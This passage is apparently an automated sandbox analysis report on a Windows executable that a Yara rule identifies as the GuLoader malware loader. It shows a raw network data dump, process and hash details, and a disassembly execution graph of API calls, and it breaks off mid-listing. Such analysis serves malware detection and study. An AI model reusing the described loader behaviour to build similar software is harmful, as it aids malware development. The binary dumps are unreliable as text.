                                                        Data Ascii: 9:I-.Szao~![hJB]LSPE"GIfku[o[ZYE(;Rhmke*]b!q%s@6ef?;bQZA%I>7W$`lEG>FdPfnmQ"$S_OeHm`4)m#02S04["a:,KuvwU;Z7dLi!Y(jixwE,
                                                        2024-10-20 17:09:31 UTC8000INData Raw: 24 a1 db 4f 33 ad d2 2b 96 43 f0 76 43 1e 75 f2 5b 04 6a 74 69 e4 4b fe 40 06 b2 a5 98 21 bb 37 d4 b4 a7 0b 8d d7 97 79 e9 15 fd 26 0f 15 96 d8 96 c9 41 9f 83 29 5f 3b 9e 04 e0 03 15 c5 4a 4b 45 0b e2 47 db 11 22 24 b1 84 f1 db 9f 4a 05 97 d9 be 9d 64 d6 e3 8b 0a a6 2f a8 0a 3d 02 43 15 4b 51 e2 d0 ee d7 03 da f0 87 06 09 f9 b2 4f be 09 95 7b 8c 4f b4 26 f1 09 3f d8 e7 2e 13 f0 17 31 6c ee c6 93 02 ce bb c1 63 23 bc c1 77 67 4b dd 31 11 5f 48 a8 33 55 4e 4e bb d2 18 93 84 72 d3 d2 ae 40 50 b1 c4 11 a4 d2 eb 71 1d f7 b1 82 cb 87 58 ca 27 95 45 ff c6 46 46 bf c2 fc 95 09 ca 52 ae 78 08 cb 45 0a 40 9b 03 42 c3 1a de 56 cf 73 0e cf 66 d3 2b 10 a4 eb 56 e9 f1 92 8e 74 eb 44 9e bd 37 68 bd 12 d7 d4 a9 9a 19 3b 5e cb 2a fa 7e f0 4f 70 72 8d 7e 2a 67 8a 69 18 8b
                                                        Data Ascii: $O3+CvCu[jtiK@!7y&A)_;JKEG"$Jd/=CKQO{O&?.1lc#wgK1_H3UNNr@PqX'EFFRxE@BVsf+VtD7h;^*~Opr~*gi


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:13:08:01
                                                        Start date:20/10/2024
                                                        Path:C:\Users\user\Desktop\450707124374000811.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\450707124374000811.exe"
                                                        Imagebase:0x400000
                                                        File size:1'001'467 bytes
                                                        MD5 hash:22AEAB62009AAA9073B3159D7DA1195E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2468313249.0000000002BF8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:13:09:18
                                                        Start date:20/10/2024
                                                        Path:C:\Users\user\Desktop\450707124374000811.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\450707124374000811.exe"
                                                        Imagebase:0x400000
                                                        File size:1'001'467 bytes
                                                        MD5 hash:22AEAB62009AAA9073B3159D7DA1195E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:22.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:19.6%
                                                          Total number of Nodes:1542
                                                          Total number of Limit Nodes:46
                                                          execution_graph 4934 10001000 4937 1000101b 4934->4937 4944 10001516 4937->4944 4939 10001020 4940 10001024 4939->4940 4941 10001027 GlobalAlloc 4939->4941 4942 1000153d 3 API calls 4940->4942 4941->4940 4943 10001019 4942->4943 4946 1000151c 4944->4946 4945 10001522 4945->4939 4946->4945 4947 1000152e GlobalFree 4946->4947 4947->4939 3894 401941 3895 401943 3894->3895 3896 402c37 17 API calls 3895->3896 3897 401948 3896->3897 3900 405990 3897->3900 3939 405c5b 3900->3939 3903 4059b8 DeleteFileW 3905 401951 3903->3905 3904 4059cf 3906 405aef 3904->3906 3953 406282 lstrcpynW 3904->3953 3906->3905 3971 4065c5 FindFirstFileW 3906->3971 3908 4059f5 3909 405a08 3908->3909 3910 4059fb lstrcatW 3908->3910 3954 405b9f lstrlenW 3909->3954 3911 405a0e 3910->3911 3915 405a1e lstrcatW 3911->3915 3917 405a29 lstrlenW FindFirstFileW 3911->3917 3915->3917 3916 405b18 3974 405b53 lstrlenW CharPrevW 3916->3974 3917->3906 3924 405a4b 3917->3924 3920 405ad2 FindNextFileW 3920->3924 3925 405ae8 FindClose 3920->3925 3921 405948 5 API calls 3923 405b2a 3921->3923 3926 405b44 3923->3926 3927 405b2e 3923->3927 3924->3920 3933 405a93 3924->3933 3958 406282 lstrcpynW 3924->3958 3925->3906 3929 4052e6 24 API calls 3926->3929 3927->3905 3930 4052e6 24 API calls 3927->3930 3929->3905 3932 405b3b 3930->3932 3931 405990 60 API calls 3931->3933 3935 406048 36 API calls 3932->3935 3933->3920 3933->3931 3934 4052e6 24 API calls 3933->3934 3936 4052e6 24 API calls 3933->3936 3959 405948 3933->3959 3967 406048 MoveFileExW 3933->3967 3934->3920 3937 405b42 3935->3937 3936->3933 3937->3905 3977 406282 lstrcpynW 3939->3977 3941 405c6c 3978 405bfe CharNextW CharNextW 3941->3978 3944 4059b0 3944->3903 3944->3904 3945 406516 5 API calls 3951 405c82 3945->3951 3946 405cb3 lstrlenW 3947 405cbe 3946->3947 3946->3951 3949 405b53 3 API calls 3947->3949 3948 4065c5 2 API calls 3948->3951 3950 405cc3 GetFileAttributesW 3949->3950 3950->3944 3951->3944 3951->3946 3951->3948 3952 405b9f 2 API calls 3951->3952 3952->3946 3953->3908 3955 405bad 3954->3955 3956 405bb3 CharPrevW 3955->3956 3957 405bbf 3955->3957 3956->3955 3956->3957 3957->3911 3958->3924 3984 405d4f GetFileAttributesW 3959->3984 3962 405975 3962->3933 3963 405963 RemoveDirectoryW 3965 405971 3963->3965 3964 40596b DeleteFileW 3964->3965 3965->3962 3966 405981 SetFileAttributesW 3965->3966 3966->3962 3968 406069 3967->3968 3969 40605c 3967->3969 3968->3933 3987 405ece 3969->3987 3972 405b14 3971->3972 3973 4065db FindClose 3971->3973 3972->3905 3972->3916 3973->3972 3975 405b1e 3974->3975 3976 405b6f lstrcatW 3974->3976 3975->3921 3976->3975 3977->3941 3979 405c1b 3978->3979 3983 405c2d 3978->3983 3981 405c28 CharNextW 3979->3981 3979->3983 3980 405c51 3980->3944 3980->3945 3981->3980 3982 405b80 CharNextW 3982->3983 3983->3980 3983->3982 3985 405d61 SetFileAttributesW 3984->3985 3986 405954 3984->3986 3985->3986 3986->3962 3986->3963 3986->3964 3988 405f24 GetShortPathNameW 3987->3988 3989 405efe 3987->3989 3990 406043 3988->3990 3991 405f39 3988->3991 4014 405d74 GetFileAttributesW CreateFileW 3989->4014 3990->3968 3991->3990 3993 405f41 wsprintfA 3991->3993 3995 4062a4 17 API calls 3993->3995 3994 405f08 CloseHandle GetShortPathNameW 3994->3990 3996 405f1c 3994->3996 3997 405f69 3995->3997 3996->3988 3996->3990 4015 405d74 GetFileAttributesW CreateFileW 3997->4015 3999 405f76 3999->3990 4000 405f85 GetFileSize GlobalAlloc 3999->4000 4001 405fa7 4000->4001 4002 40603c CloseHandle 4000->4002 4016 405df7 ReadFile 4001->4016 4002->3990 4007 405fc6 lstrcpyA 4010 405fe8 4007->4010 4008 405fda 4009 405cd9 4 API calls 4008->4009 4009->4010 4011 40601f SetFilePointer 4010->4011 4023 405e26 WriteFile 4011->4023 4014->3994 4015->3999 4017 405e15 4016->4017 4017->4002 4018 405cd9 lstrlenA 4017->4018 4019 405d1a lstrlenA 4018->4019 4020 405d22 4019->4020 4021 405cf3 lstrcmpiA 4019->4021 4020->4007 4020->4008 4021->4020 4022 405d11 CharNextA 4021->4022 4022->4019 4024 405e44 GlobalFree 4023->4024 4024->4002 4025 4015c1 4026 402c37 17 API calls 4025->4026 4027 4015c8 4026->4027 4028 405bfe 4 API calls 4027->4028 4040 4015d1 4028->4040 4029 401631 4031 401663 4029->4031 4032 401636 4029->4032 4030 405b80 CharNextW 4030->4040 4034 401423 24 API calls 4031->4034 4052 401423 4032->4052 4041 40165b 4034->4041 4039 40164a SetCurrentDirectoryW 4039->4041 4040->4029 4040->4030 4042 401617 GetFileAttributesW 4040->4042 4044 40584f 4040->4044 4047 4057b5 CreateDirectoryW 4040->4047 4056 405832 CreateDirectoryW 4040->4056 4042->4040 4059 40665c GetModuleHandleA 4044->4059 4048 405802 4047->4048 4049 405806 GetLastError 4047->4049 4048->4040 4049->4048 4050 405815 SetFileSecurityW 4049->4050 4050->4048 4051 40582b GetLastError 4050->4051 4051->4048 4053 4052e6 24 API calls 4052->4053 4054 401431 4053->4054 4055 406282 lstrcpynW 4054->4055 4055->4039 4057 405842 4056->4057 4058 405846 GetLastError 4056->4058 4057->4040 4058->4057 4060 406682 GetProcAddress 4059->4060 4061 406678 4059->4061 4064 405856 4060->4064 4065 4065ec GetSystemDirectoryW 4061->4065 4063 40667e 4063->4060 4063->4064 4064->4040 4066 40660e wsprintfW LoadLibraryExW 4065->4066 4066->4063 4181 401e43 4189 402c15 4181->4189 4183 401e49 4184 402c15 17 API calls 4183->4184 4185 401e55 4184->4185 4186 401e61 ShowWindow 4185->4186 4187 401e6c EnableWindow 4185->4187 4188 402abf 4186->4188 4187->4188 4190 4062a4 17 API calls 4189->4190 4191 402c2a 4190->4191 4191->4183 4192 402644 4193 402c15 17 API calls 4192->4193 4201 402653 4193->4201 4194 402790 4195 40269d ReadFile 4195->4194 4195->4201 4196 402736 4196->4194 4196->4201 4206 405e55 SetFilePointer 4196->4206 4197 405df7 ReadFile 4197->4201 4199 402792 4215 4061c9 wsprintfW 4199->4215 4200 4026dd MultiByteToWideChar 4200->4201 4201->4194 4201->4195 4201->4196 4201->4197 4201->4199 4201->4200 4203 402703 SetFilePointer MultiByteToWideChar 4201->4203 4204 4027a3 4201->4204 4203->4201 4204->4194 4205 4027c4 SetFilePointer 4204->4205 4205->4194 4207 405e71 4206->4207 4212 405e8d 4206->4212 4208 405df7 ReadFile 4207->4208 4209 405e7d 4208->4209 4210 405e96 SetFilePointer 4209->4210 4211 405ebe SetFilePointer 4209->4211 4209->4212 4210->4211 4213 405ea1 4210->4213 4211->4212 4212->4196 4214 405e26 WriteFile 4213->4214 4214->4212 4215->4194 4226 402348 4227 402c37 17 API calls 4226->4227 4228 402357 4227->4228 4229 402c37 17 API calls 4228->4229 4230 402360 4229->4230 4231 402c37 17 API calls 4230->4231 4232 40236a GetPrivateProfileStringW 4231->4232 4951 4016cc 4952 402c37 17 API calls 4951->4952 4953 4016d2 GetFullPathNameW 4952->4953 4954 40170e 4953->4954 4955 4016ec 4953->4955 4956 401723 GetShortPathNameW 4954->4956 4957 402abf 4954->4957 4955->4954 4958 4065c5 2 API calls 4955->4958 4956->4957 4959 4016fe 4958->4959 4959->4954 4961 406282 lstrcpynW 4959->4961 4961->4954 4962 401b4d 4963 402c37 17 API calls 4962->4963 4964 401b54 4963->4964 4965 402c15 17 API calls 4964->4965 4966 401b5d wsprintfW 4965->4966 4967 402abf 4966->4967 4968 40394e 4969 403959 4968->4969 4970 403960 GlobalAlloc 4969->4970 4971 40395d 4969->4971 4970->4971 4972 401f52 4973 402c37 17 API calls 4972->4973 4974 401f59 4973->4974 4975 4065c5 2 API calls 4974->4975 4976 401f5f 4975->4976 4978 401f70 4976->4978 4979 4061c9 wsprintfW 4976->4979 4979->4978 4980 402253 4981 402c37 17 API calls 4980->4981 4982 402259 4981->4982 4983 402c37 17 API calls 4982->4983 4984 402262 4983->4984 4985 402c37 17 API calls 4984->4985 4986 40226b 4985->4986 4987 4065c5 2 API calls 4986->4987 4988 402274 4987->4988 4989 402285 lstrlenW lstrlenW 4988->4989 4993 402278 4988->4993 4990 4052e6 24 API calls 4989->4990 4992 4022c3 SHFileOperationW 4990->4992 4991 4052e6 24 API calls 4994 402280 4991->4994 4992->4993 4992->4994 4993->4991 4995 401956 4996 402c37 17 API calls 4995->4996 4997 40195d lstrlenW 4996->4997 4998 40258c 4997->4998 4999 4014d7 5000 402c15 17 API calls 4999->5000 5001 4014dd Sleep 5000->5001 5003 402abf 5001->5003 5004 4022d7 5005 4022de 5004->5005 5009 4022f1 5004->5009 5006 4062a4 17 API calls 5005->5006 5007 4022eb 5006->5007 5008 4058e4 MessageBoxIndirectW 5007->5008 5008->5009 5010 401d57 GetDlgItem GetClientRect 5011 402c37 17 API calls 5010->5011 5012 401d89 LoadImageW SendMessageW 5011->5012 5013 401da7 DeleteObject 5012->5013 5014 402abf 5012->5014 5013->5014 5015 402dd7 5016 402e02 5015->5016 5017 402de9 SetTimer 5015->5017 5018 402e57 5016->5018 5019 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5016->5019 5017->5016 5019->5018 4799 40525a 4800 40526a 4799->4800 4801 40527e 4799->4801 4802 405270 4800->4802 4812 4052c7 4800->4812 4803 405286 IsWindowVisible 4801->4803 4807 4052a6 4801->4807 4805 404263 SendMessageW 4802->4805 4806 405293 4803->4806 4803->4812 4804 4052cc CallWindowProcW 4808 40527a 4804->4808 4805->4808 4809 404bb0 5 API calls 4806->4809 4807->4804 4811 404c30 4 API calls 4807->4811 4810 40529d 4809->4810 4810->4807 4811->4812 4812->4804 4813 40175c 4814 402c37 17 API calls 4813->4814 4815 401763 4814->4815 4816 405da3 2 API calls 4815->4816 4817 40176a 4816->4817 4818 405da3 2 API calls 4817->4818 4818->4817 4819 4023de 4820 402c37 17 API calls 4819->4820 4821 4023f0 4820->4821 4822 402c37 17 API calls 4821->4822 4823 4023fa 4822->4823 4836 402cc7 4823->4836 4826 402432 4827 40243e 4826->4827 4830 402c15 17 API calls 4826->4830 4831 40245d RegSetValueExW 4827->4831 4833 4030fa 31 API calls 4827->4833 4828 402885 4829 402c37 17 API calls 4832 402428 lstrlenW 4829->4832 4830->4827 4834 402473 RegCloseKey 4831->4834 4832->4826 4833->4831 4834->4828 4837 402ce2 4836->4837 4840 40611d 4837->4840 4841 40612c 4840->4841 4842 40240a 4841->4842 4843 406137 RegCreateKeyExW 4841->4843 4842->4826 4842->4828 4842->4829 4843->4842 4068 404c62 GetDlgItem GetDlgItem 4069 404cb4 7 API calls 4068->4069 4077 404ecd 4068->4077 4070 404d57 DeleteObject 4069->4070 4071 404d4a SendMessageW 4069->4071 4072 404d60 4070->4072 4071->4070 4073 404d6f 4072->4073 4074 404d97 4072->4074 4075 4062a4 17 API calls 4073->4075 4124 404217 4074->4124 4080 404d79 SendMessageW SendMessageW 4075->4080 4076 404f92 4086 404fb1 4076->4086 4088 404fa3 SendMessageW 4076->4088 4077->4076 4083 404f2d 4077->4083 4077->4086 4079 40505d 4081 405067 SendMessageW 4079->4081 4082 40506f 4079->4082 4080->4072 4081->4082 4093 405081 ImageList_Destroy 4082->4093 4094 405088 4082->4094 4104 405098 4082->4104 4129 404bb0 SendMessageW 4083->4129 4084 404dab 4090 404217 18 API calls 4084->4090 4085 405245 4146 40427e 4085->4146 4086->4079 4086->4085 4091 40500a SendMessageW 4086->4091 4088->4086 4110 404db9 4090->4110 4091->4085 4095 40501f SendMessageW 4091->4095 4093->4094 4097 405091 GlobalFree 4094->4097 4094->4104 4099 405032 4095->4099 4096 405207 4096->4085 4100 405219 ShowWindow GetDlgItem ShowWindow 4096->4100 4097->4104 4098 404e8e GetWindowLongW SetWindowLongW 4101 404ea7 4098->4101 4105 405043 SendMessageW 4099->4105 4100->4085 4102 404ec5 4101->4102 4103 404ead ShowWindow 4101->4103 4128 40424c SendMessageW 4102->4128 4127 40424c SendMessageW 4103->4127 4104->4096 4119 4050d3 4104->4119 4134 404c30 4104->4134 4105->4079 4106 404e88 4106->4098 4106->4101 4109 404f3e 4109->4076 4110->4098 4110->4106 4111 404e09 SendMessageW 4110->4111 4112 404e45 SendMessageW 4110->4112 4113 404e56 SendMessageW 4110->4113 4111->4110 4112->4110 4113->4110 4115 404ec0 4115->4085 4116 4051dd InvalidateRect 4116->4096 4117 4051f3 4116->4117 4143 404b6b 4117->4143 4118 405101 SendMessageW 4120 405117 4118->4120 4119->4118 4119->4120 4120->4116 4121 405178 4120->4121 4123 40518b SendMessageW SendMessageW 4120->4123 4121->4123 4123->4120 4125 4062a4 17 API calls 4124->4125 4126 404222 SetDlgItemTextW 4125->4126 4126->4084 4127->4115 4128->4077 4130 404bd3 GetMessagePos ScreenToClient SendMessageW 4129->4130 4131 404c0f SendMessageW 4129->4131 4132 404c07 4130->4132 4133 404c0c 4130->4133 4131->4132 4132->4109 4133->4131 4160 406282 lstrcpynW 4134->4160 4136 404c43 4161 4061c9 wsprintfW 4136->4161 4138 404c4d 4162 40140b 4138->4162 4142 404c5d 4142->4119 4170 404aa2 4143->4170 4145 404b80 4145->4096 4147 404296 GetWindowLongW 4146->4147 4148 40431f 4146->4148 4147->4148 4149 4042a7 4147->4149 4150 4042b6 GetSysColor 4149->4150 4151 4042b9 4149->4151 4150->4151 4152 4042c9 SetBkMode 4151->4152 4153 4042bf SetTextColor 4151->4153 4154 4042e1 GetSysColor 4152->4154 4155 4042e7 4152->4155 4153->4152 4154->4155 4156 4042f8 4155->4156 4157 4042ee SetBkColor 4155->4157 4156->4148 4158 404312 CreateBrushIndirect 4156->4158 4159 40430b DeleteObject 4156->4159 4157->4156 4158->4148 4159->4158 4160->4136 4161->4138 4166 401389 4162->4166 4165 406282 lstrcpynW 4165->4142 4168 401390 4166->4168 4167 4013fe 4167->4165 4168->4167 4169 4013cb MulDiv SendMessageW 4168->4169 4169->4168 4171 404abb 4170->4171 4172 4062a4 17 API calls 4171->4172 4173 404b1f 4172->4173 4174 4062a4 17 API calls 4173->4174 4175 404b2a 4174->4175 4176 4062a4 17 API calls 4175->4176 4177 404b40 lstrlenW wsprintfW SetDlgItemTextW 4176->4177 4177->4145 5020 402862 5021 402c37 17 API calls 5020->5021 5022 402869 FindFirstFileW 5021->5022 5023 402891 5022->5023 5024 40287c 5022->5024 5028 4061c9 wsprintfW 5023->5028 5026 40289a 5029 406282 lstrcpynW 5026->5029 5028->5026 5029->5024 5030 401563 5031 402a65 5030->5031 5034 4061c9 wsprintfW 5031->5034 5033 402a6a 5034->5033 5035 404365 lstrlenW 5036 404384 5035->5036 5037 404386 WideCharToMultiByte 5035->5037 5036->5037 5038 4046e6 5039 404712 5038->5039 5040 404723 5038->5040 5099 4058c8 GetDlgItemTextW 5039->5099 5041 40472f GetDlgItem 5040->5041 5044 40478e 5040->5044 5043 404743 5041->5043 5048 404757 SetWindowTextW 5043->5048 5051 405bfe 4 API calls 5043->5051 5045 404872 5044->5045 5053 4062a4 17 API calls 5044->5053 5097 404a21 5044->5097 5045->5097 5101 4058c8 GetDlgItemTextW 5045->5101 5046 40471d 5047 406516 5 API calls 5046->5047 5047->5040 5052 404217 18 API calls 5048->5052 5050 40427e 8 API calls 5055 404a35 5050->5055 5056 40474d 5051->5056 5057 404773 5052->5057 5058 404802 SHBrowseForFolderW 5053->5058 5054 4048a2 5059 405c5b 18 API calls 5054->5059 5056->5048 5062 405b53 3 API calls 5056->5062 5060 404217 18 API calls 5057->5060 5058->5045 5061 40481a CoTaskMemFree 5058->5061 5065 4048a8 5059->5065 5063 404781 5060->5063 5064 405b53 3 API calls 5061->5064 5062->5048 5100 40424c SendMessageW 5063->5100 5067 404827 5064->5067 5102 406282 lstrcpynW 5065->5102 5070 40485e SetDlgItemTextW 5067->5070 5074 4062a4 17 API calls 5067->5074 5069 404787 5073 40665c 5 API calls 5069->5073 5070->5045 5071 4048bf 5072 40665c 5 API calls 5071->5072 5080 4048c6 5072->5080 5073->5044 5075 404846 lstrcmpiW 5074->5075 5075->5070 5077 404857 lstrcatW 5075->5077 5076 404907 5103 406282 lstrcpynW 5076->5103 5077->5070 5079 40490e 5081 405bfe 4 API calls 5079->5081 5080->5076 5085 405b9f 2 API calls 5080->5085 5086 40495f 5080->5086 5082 404914 GetDiskFreeSpaceW 5081->5082 5084 404938 MulDiv 5082->5084 5082->5086 5084->5086 5085->5080 5087 4049d0 5086->5087 5089 404b6b 20 API calls 5086->5089 5088 4049f3 5087->5088 5090 40140b 2 API calls 5087->5090 5104 404239 EnableWindow 5088->5104 5091 4049bd 5089->5091 5090->5088 5092 4049d2 SetDlgItemTextW 5091->5092 5093 4049c2 5091->5093 5092->5087 5095 404aa2 20 API calls 5093->5095 5095->5087 5096 404a0f 5096->5097 5105 40463f 5096->5105 5097->5050 5099->5046 5100->5069 5101->5054 5102->5071 5103->5079 5104->5096 5106 404652 SendMessageW 5105->5106 5107 40464d 5105->5107 5106->5097 5107->5106 5108 401968 5109 402c15 17 API calls 5108->5109 5110 40196f 5109->5110 5111 402c15 17 API calls 5110->5111 5112 40197c 5111->5112 5113 402c37 17 API calls 5112->5113 5114 401993 lstrlenW 5113->5114 5115 4019a4 5114->5115 5119 4019e5 5115->5119 5120 406282 lstrcpynW 5115->5120 5117 4019d5 5118 4019da lstrlenW 5117->5118 5117->5119 5118->5119 5120->5117 4267 4027e9 4268 4027f0 4267->4268 4270 402a6a 4267->4270 4269 402c15 17 API calls 4268->4269 4271 4027f7 4269->4271 4272 402806 SetFilePointer 4271->4272 4272->4270 4273 402816 4272->4273 4275 4061c9 wsprintfW 4273->4275 4275->4270 5121 100018a9 5122 100018cc 5121->5122 5123 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5122->5123 5124 100018ff GlobalFree 5122->5124 5125 10001272 2 API calls 5123->5125 5124->5123 5126 10001a87 GlobalFree GlobalFree 5125->5126 5127 40166a 5128 402c37 17 API calls 5127->5128 5129 401670 5128->5129 5130 4065c5 2 API calls 5129->5130 5131 401676 5130->5131 5132 401ced 5133 402c15 17 API calls 5132->5133 5134 401cf3 IsWindow 5133->5134 5135 401a20 5134->5135 4459 40176f 4460 402c37 17 API calls 4459->4460 4461 401776 4460->4461 4462 401796 4461->4462 4463 40179e 4461->4463 4519 406282 lstrcpynW 4462->4519 4520 406282 lstrcpynW 4463->4520 4466 40179c 4470 406516 5 API calls 4466->4470 4467 4017a9 4468 405b53 3 API calls 4467->4468 4469 4017af lstrcatW 4468->4469 4469->4466 4487 4017bb 4470->4487 4471 4065c5 2 API calls 4471->4487 4472 4017f7 4473 405d4f 2 API calls 4472->4473 4473->4487 4475 4017cd CompareFileTime 4475->4487 4476 40188d 4478 4052e6 24 API calls 4476->4478 4477 401864 4481 4052e6 24 API calls 4477->4481 4488 401879 4477->4488 4480 401897 4478->4480 4479 406282 lstrcpynW 4479->4487 4499 4030fa 4480->4499 4481->4488 4484 4018be SetFileTime 4486 4018d0 CloseHandle 4484->4486 4485 4062a4 17 API calls 4485->4487 4486->4488 4489 4018e1 4486->4489 4487->4471 4487->4472 4487->4475 4487->4476 4487->4477 4487->4479 4487->4485 4498 405d74 GetFileAttributesW CreateFileW 4487->4498 4521 4058e4 4487->4521 4490 4018e6 4489->4490 4491 4018f9 4489->4491 4493 4062a4 17 API calls 4490->4493 4492 4062a4 17 API calls 4491->4492 4494 401901 4492->4494 4496 4018ee lstrcatW 4493->4496 4497 4058e4 MessageBoxIndirectW 4494->4497 4496->4494 4497->4488 4498->4487 4501 403113 4499->4501 4500 403141 4525 403315 4500->4525 4501->4500 4528 40332b SetFilePointer 4501->4528 4505 4032ae 4507 4032f0 4505->4507 4511 4032b2 4505->4511 4506 40315e GetTickCount 4510 4018aa 4506->4510 4518 4031ad 4506->4518 4509 403315 ReadFile 4507->4509 4508 403315 ReadFile 4508->4518 4509->4510 4510->4484 4510->4486 4511->4510 4512 403315 ReadFile 4511->4512 4513 405e26 WriteFile 4511->4513 4512->4511 4513->4511 4514 403203 GetTickCount 4514->4518 4515 403228 MulDiv wsprintfW 4516 4052e6 24 API calls 4515->4516 4516->4518 4517 405e26 WriteFile 4517->4518 4518->4508 4518->4510 4518->4514 4518->4515 4518->4517 4519->4466 4520->4467 4522 4058f9 4521->4522 4523 405945 4522->4523 4524 40590d MessageBoxIndirectW 4522->4524 4523->4487 4524->4523 4526 405df7 ReadFile 4525->4526 4527 40314c 4526->4527 4527->4505 4527->4506 4527->4510 4528->4500 5136 402570 5137 402c37 17 API calls 5136->5137 5138 402577 5137->5138 5141 405d74 GetFileAttributesW CreateFileW 5138->5141 5140 402583 5141->5140 4529 401b71 4530 401bc2 4529->4530 4531 401b7e 4529->4531 4532 401bc7 4530->4532 4533 401bec GlobalAlloc 4530->4533 4534 401c07 4531->4534 4539 401b95 4531->4539 4543 4022f1 4532->4543 4550 406282 lstrcpynW 4532->4550 4536 4062a4 17 API calls 4533->4536 4535 4062a4 17 API calls 4534->4535 4534->4543 4538 4022eb 4535->4538 4536->4534 4542 4058e4 MessageBoxIndirectW 4538->4542 4548 406282 lstrcpynW 4539->4548 4540 401bd9 GlobalFree 4540->4543 4542->4543 4544 401ba4 4549 406282 lstrcpynW 4544->4549 4546 401bb3 4551 406282 lstrcpynW 4546->4551 4548->4544 4549->4546 4550->4540 4551->4543 5142 401a72 5143 402c15 17 API calls 5142->5143 5144 401a78 5143->5144 5145 402c15 17 API calls 5144->5145 5146 401a20 5145->5146 5147 4024f2 5148 402c77 17 API calls 5147->5148 5149 4024fc 5148->5149 5150 402c15 17 API calls 5149->5150 5151 402505 5150->5151 5152 402521 RegEnumKeyW 5151->5152 5153 40252d RegEnumValueW 5151->5153 5155 402885 5151->5155 5154 402542 RegCloseKey 5152->5154 5153->5154 5154->5155 4552 403373 SetErrorMode GetVersion 4553 4033b2 4552->4553 4554 4033b8 4552->4554 4555 40665c 5 API calls 4553->4555 4556 4065ec 3 API calls 4554->4556 4555->4554 4557 4033ce lstrlenA 4556->4557 4557->4554 4558 4033de 4557->4558 4559 40665c 5 API calls 4558->4559 4560 4033e5 4559->4560 4561 40665c 5 API calls 4560->4561 4562 4033ec 4561->4562 4563 40665c 5 API calls 4562->4563 4564 4033f8 #17 OleInitialize SHGetFileInfoW 4563->4564 4643 406282 lstrcpynW 4564->4643 4567 403444 GetCommandLineW 4644 406282 lstrcpynW 4567->4644 4569 403456 GetModuleHandleW 4570 40346e 4569->4570 4571 405b80 CharNextW 4570->4571 4572 40347d CharNextW 4571->4572 4573 4035a7 GetTempPathW 4572->4573 4582 403496 4572->4582 4645 403342 4573->4645 4575 4035bf 4576 4035c3 GetWindowsDirectoryW lstrcatW 4575->4576 4577 403619 DeleteFileW 4575->4577 4578 403342 12 API calls 4576->4578 4655 402ec1 GetTickCount GetModuleFileNameW 4577->4655 4581 4035df 4578->4581 4579 405b80 CharNextW 4579->4582 4581->4577 4584 4035e3 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4581->4584 4582->4579 4588 403592 4582->4588 4590 403590 4582->4590 4583 40362d 4585 4036e0 4583->4585 4586 4036d0 4583->4586 4591 405b80 CharNextW 4583->4591 4589 403342 12 API calls 4584->4589 4742 4038b6 4585->4742 4683 403990 4586->4683 4739 406282 lstrcpynW 4588->4739 4595 403611 4589->4595 4590->4573 4607 40364c 4591->4607 4595->4577 4595->4585 4596 40381a 4599 403822 GetCurrentProcess OpenProcessToken 4596->4599 4600 40389e ExitProcess 4596->4600 4597 4036fa 4598 4058e4 MessageBoxIndirectW 4597->4598 4604 403708 ExitProcess 4598->4604 4605 40383a LookupPrivilegeValueW AdjustTokenPrivileges 4599->4605 4606 40386e 4599->4606 4602 403710 4609 40584f 5 API calls 4602->4609 4603 4036aa 4608 405c5b 18 API calls 4603->4608 4605->4606 4610 40665c 5 API calls 4606->4610 4607->4602 4607->4603 4612 4036b6 4608->4612 4613 403715 lstrcatW 4609->4613 4611 403875 4610->4611 4614 40388a ExitWindowsEx 4611->4614 4617 403897 4611->4617 4612->4585 4740 406282 lstrcpynW 4612->4740 4615 403731 lstrcatW lstrcmpiW 4613->4615 4616 403726 lstrcatW 4613->4616 4614->4600 4614->4617 4615->4585 4619 40374d 4615->4619 4616->4615 4622 40140b 2 API calls 4617->4622 4620 403752 4619->4620 4621 403759 4619->4621 4624 4057b5 4 API calls 4620->4624 4625 405832 2 API calls 4621->4625 4622->4600 4623 4036c5 4741 406282 lstrcpynW 4623->4741 4627 403757 4624->4627 4628 40375e SetCurrentDirectoryW 4625->4628 4627->4628 4629 403779 4628->4629 4630 40376e 4628->4630 4750 406282 lstrcpynW 4629->4750 4749 406282 lstrcpynW 4630->4749 4633 4062a4 17 API calls 4634 4037b8 DeleteFileW 4633->4634 4635 4037c5 CopyFileW 4634->4635 4640 403787 4634->4640 4635->4640 4636 40380e 4638 406048 36 API calls 4636->4638 4637 406048 36 API calls 4637->4640 4638->4585 4639 4062a4 17 API calls 4639->4640 4640->4633 4640->4636 4640->4637 4640->4639 4641 405867 2 API calls 4640->4641 4642 4037f9 CloseHandle 4640->4642 4641->4640 4642->4640 4643->4567 4644->4569 4646 406516 5 API calls 4645->4646 4647 40334e 4646->4647 4648 403358 4647->4648 4649 405b53 3 API calls 4647->4649 4648->4575 4650 403360 4649->4650 4651 405832 2 API calls 4650->4651 4652 403366 4651->4652 4751 405da3 4652->4751 4755 405d74 GetFileAttributesW CreateFileW 4655->4755 4657 402f01 4676 402f11 4657->4676 4756 406282 lstrcpynW 4657->4756 4659 402f27 4660 405b9f 2 API calls 4659->4660 4661 402f2d 4660->4661 4757 406282 lstrcpynW 4661->4757 4663 402f38 GetFileSize 4664 403034 4663->4664 4682 402f4f 4663->4682 4758 402e5d 4664->4758 4666 40303d 4668 40306d GlobalAlloc 4666->4668 4666->4676 4770 40332b SetFilePointer 4666->4770 4667 403315 ReadFile 4667->4682 4769 40332b SetFilePointer 4668->4769 4671 4030a0 4673 402e5d 6 API 